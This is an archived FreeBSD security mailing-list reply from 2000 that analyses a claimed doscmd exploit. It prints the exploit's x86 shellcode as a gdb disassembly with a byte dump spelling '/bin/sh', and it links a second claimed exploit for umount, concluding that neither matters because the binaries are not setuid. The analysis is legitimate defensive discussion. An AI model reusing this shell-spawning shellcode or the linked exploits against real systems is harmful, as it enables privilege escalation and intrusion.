Skip site navigation (1)Skip section navigation (2) 
Date:      Wed, 16 Feb 2000 09:41:39 -0700 (MST)
From:      Paul Hart <hart@iserver.com>
To:        Brett Glass <brett@lariat.org>
Cc:        freebsd-security@FreeBSD.ORG
Subject:   Re: Doscmd
Message-ID:  <Pine.BSF.4.21.0002160923340.66839-100000@anchovy.orem.iserver.com>
In-Reply-To: <4.2.2.20000215235704.043169d0@localhost>
next in thread | previous in thread | raw e-mail | index | archive | help 
On Tue, 15 Feb 2000, Brett Glass wrote:

> If it relies on doscmd being suid, then it would fail. But
> I have wondered whether control of your descriptor tables would
> let you hack the system.  What's in that machine language?

Nothing interesting.  Just the standard exec-a-shell code:

(gdb) x/19i 0x80487d7
0x80487d7 <_fini+7>:    jmp    0x80487fc <_fini+44>
0x80487d9 <_fini+9>:    popl   %esi
0x80487da <_fini+10>:   leal   (%esi),%ebx
0x80487dc <_fini+12>:   movl   %ebx,0xb(%esi)
0x80487df <_fini+15>:   xorl   %edx,%edx
0x80487e1 <_fini+17>:   movl   %edx,0x7(%esi)
0x80487e4 <_fini+20>:   movl   %edx,0xf(%esi)
0x80487e7 <_fini+23>:   movl   %edx,0x14(%esi)
0x80487ea <_fini+26>:   movb   %dl,0x19(%esi)
0x80487ed <_fini+29>:   xorl   %eax,%eax
0x80487ef <_fini+31>:   movb   $0x3b,%al
0x80487f1 <_fini+33>:   leal   0xb(%esi),%ecx
0x80487f4 <_fini+36>:   movl   %ecx,%edx
0x80487f6 <_fini+38>:   pushl  %edx
0x80487f7 <_fini+39>:   pushl  %ecx
0x80487f8 <_fini+40>:   pushl  %ebx
0x80487f9 <_fini+41>:   pushl  %eax
0x80487fa <_fini+42>:   jmp    0x8048814 <_fini+68>
0x80487fc <_fini+44>:   call   0x80487d9 <_fini+9>
(gdb) x/1i 0x8048814
0x8048814 <_fini+68>:   lcall  0x407,0x4040404
(gdb) x/19xb 0x8048801
0x8048801 <_fini+49>:   0x2f    0x62    0x69    0x6e    0x2f    0x73    0x68    0x01
0x8048809 <_fini+57>:   0x01    0x01    0x01    0x02    0x02    0x02    0x02    0x03
0x8048811 <_fini+65>:   0x03    0x03    0x03
(gdb) 

For what it's worth, there is another so-called "exploit" for FreeBSD on
Packetstorm Security:

    http://packetstorm.securify.com/0002-exploits/umount.c

I don't know about you, but my /sbin/umount isn't SUID either.  ;-)

Paul Hart

--
Paul Robert Hart        ><8>  ><8>  ><8>        Verio Web Hosting, Inc.
hart@iserver.com        ><8>  ><8>  ><8>        http://www.iserver.com/




To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.4.21.0002160923340.66839-100000>